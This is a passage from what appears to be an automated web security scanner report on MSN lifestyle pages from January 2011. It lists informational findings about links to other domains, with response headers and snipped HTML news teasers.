<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345068&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FNathan-Woods-dies.aspx%3Fcp-documentid%3D27467027&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=nathan+woods+dies&go=&form=msnpop"><strong>
...[SNIP]...
<div>Two-time World Off-Road Champion <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=nathan+woods+dies&go=&form=msnpop">Nathan Woods died</a> Friday after a crash while practicing in California (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=worcs+motorcycle+racing&FORM=msnpop">for what race?</a>
...[SNIP]...
<div>Watch video of Woods <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/watch/video/nathan-woods-on-a-husaberg-for-2010-worcs/4dd9d135770901d9f3694dd9d135770901d9f369-418410135638?q=nathan+woods&FROM=LKVR5&GT1=LKVR5&FORM=msnpop">prepping for a race</a>
...[SNIP]...
<div>BMX rider <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=tj+lavin+crash&form=msnpop">TJ Lavin</a>
...[SNIP]...
<div>Find out which jobs are considered to be <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=most+dangerous+jobs&form=msnpop">the most dangerous</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.327. http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Nathan-Woods-dies.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx?cp-documentid=27467027

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=most+dangerous+jobs&form=msnpop
http://www.bing.com/search?q=nathan+woods+dies&go=&form=msnpop
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=tj+lavin+crash&form=msnpop
http://www.bing.com/search?q=worcs+motorcycle+racing&FORM=msnpop
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/nathan-woods-on-a-husaberg-for-2010-worcs/4dd9d135770901d9f3694dd9d135770901d9f369-418410135638?q=nathan+woods&FROM=LKVR5&GT1=LKVR5&FORM=msnpop
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406687&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FNathan-Woods-dies.aspx%3Fcp-documentid%3D27467027&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:07 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a913943685be4a59a8ca853fd79de5c5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=F9FF5E73AFA943D3ABF505A8F607148F; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:07 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 22592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406687&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FNathan-Woods-dies.aspx%3Fcp-documentid%3D27467027&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=nathan+woods+dies&go=&form=msnpop"><strong>
...[SNIP]...
<div>Two-time World Off-Road Champion <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=nathan+woods+dies&go=&form=msnpop">Nathan Woods died</a> Friday after a crash while practicing in California (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=worcs+motorcycle+racing&FORM=msnpop">for what race?</a>
...[SNIP]...
<div>Watch video of Woods <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/videos/watch/video/nathan-woods-on-a-husaberg-for-2010-worcs/4dd9d135770901d9f3694dd9d135770901d9f369-418410135638?q=nathan+woods&FROM=LKVR5&GT1=LKVR5&FORM=msnpop">prepping for a race</a>
...[SNIP]...
<div>BMX rider <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=tj+lavin+crash&form=msnpop">TJ Lavin</a>
...[SNIP]...
<div>Find out which jobs are considered to be <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=most+dangerous+jobs&form=msnpop">the most dangerous</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.328. http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx?cp-documentid=27453665

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=%22Tihomir+Petrov%22&go=&form=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=Bruce+Jackson%2C+a+biotechnology+professor+&form=msnpop
http://www.bing.com/news/search?q=Oakland+professor+and+stalking&form=msnpop
http://www.bing.com/search?q=Ph.D.+programs&go=&form=msnpop
http://www.bing.com/search?q=Tihomir+Petrov+charged&go=&form=msnpop
http://www.bing.com/search?q=Tihomir+Petrov+urinated&go=&form=msnpop
http://www.bing.com/search?q=Tihomir+Petrov+urinated+and+dispute+with+colleague&form=msnpop
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/search?q=professor+and+finding+urine+around+door&go=&form=msnpop
http://www.bing.com/search?q=professor+and+urinating+and+tape&form=msnpop
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345061&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FProfessor-accused-defacing-colleagues-door.aspx%3Fcp-documentid%3D27453665&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:01 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=44c6713e16484bef8864fe79a72511ae; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=FCB994723662439EA7B8A5803A9422E2; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:01 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345061&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FProfessor-accused-defacing-colleagues-door.aspx%3Fcp-documentid%3D27453665&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Tihomir+Petrov+urinated&go=&form=msnpop"><strong>
...[SNIP]...
<div>A California professor (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=%22Tihomir+Petrov%22&go=&form=msnpop">see photos</a>) reportedly was caught (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=professor+and+urinating+and+tape&form=msnpop">here...s how</a>) urinating on a colleague...s door. Officials say they became suspicious after <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=professor+and+finding+urine+around+door&go=&form=msnpop">they found this</a> evidence and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Tihomir+Petrov+urinated+and+dispute+with+colleague&form=msnpop">heard this talk</a>. Find out if <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Tihomir+Petrov+charged&go=&form=msnpop">he was charged</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Oakland+professor+and+stalking&form=msnpop">Here...s what</a>
...[SNIP]...
<div>A Massachusetts professor has been honored by the White House. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Bruce+Jackson%2C+a+biotechnology+professor+&form=msnpop">Find out who.</a>
...[SNIP]...
<div>Here...s help <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Ph.D.+programs&go=&form=msnpop">finding the right graduate school</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.329. http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx?cp-documentid=27453665

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/images/search?q=%22Tihomir+Petrov%22&go=&form=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=Bruce+Jackson%2C+a+biotechnology+professor+&form=msnpop
http://www.bing.com/news/search?q=Oakland+professor+and+stalking&form=msnpop
http://www.bing.com/search?q=Ph.D.+programs&go=&form=msnpop
http://www.bing.com/search?q=Tihomir+Petrov+charged&go=&form=msnpop
http://www.bing.com/search?q=Tihomir+Petrov+urinated&go=&form=msnpop
http://www.bing.com/search?q=Tihomir+Petrov+urinated+and+dispute+with+colleague&form=msnpop
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=professor+and+finding+urine+around+door&go=&form=msnpop
http://www.bing.com/search?q=professor+and+urinating+and+tape&form=msnpop
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406680&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FProfessor-accused-defacing-colleagues-door.aspx%3Fcp-documentid%3D27453665&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:00 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1434474df3fa4048b0561a473d97a621; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=3715266A091A4098881C985F230AA4BB; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:00 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23590

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406680&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FProfessor-accused-defacing-colleagues-door.aspx%3Fcp-documentid%3D27453665&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Tihomir+Petrov+urinated&go=&form=msnpop"><strong>
...[SNIP]...
<div>A California professor (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=%22Tihomir+Petrov%22&go=&form=msnpop">see photos</a>) reportedly was caught (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=professor+and+urinating+and+tape&form=msnpop">here...s how</a>) urinating on a colleague...s door. Officials say they became suspicious after <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=professor+and+finding+urine+around+door&go=&form=msnpop">they found this</a> evidence and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Tihomir+Petrov+urinated+and+dispute+with+colleague&form=msnpop">heard this talk</a>. Find out if <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Tihomir+Petrov+charged&go=&form=msnpop">he was charged</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Oakland+professor+and+stalking&form=msnpop">Here...s what</a>
...[SNIP]...
<div>A Massachusetts professor has been honored by the White House. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Bruce+Jackson%2C+a+biotechnology+professor+&form=msnpop">Find out who.</a>
...[SNIP]...
<div>Here...s help <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Ph.D.+programs&go=&form=msnpop">finding the right graduate school</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.330. http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Taco-Bell-fights-back.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx?cp-documentid=27449852

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
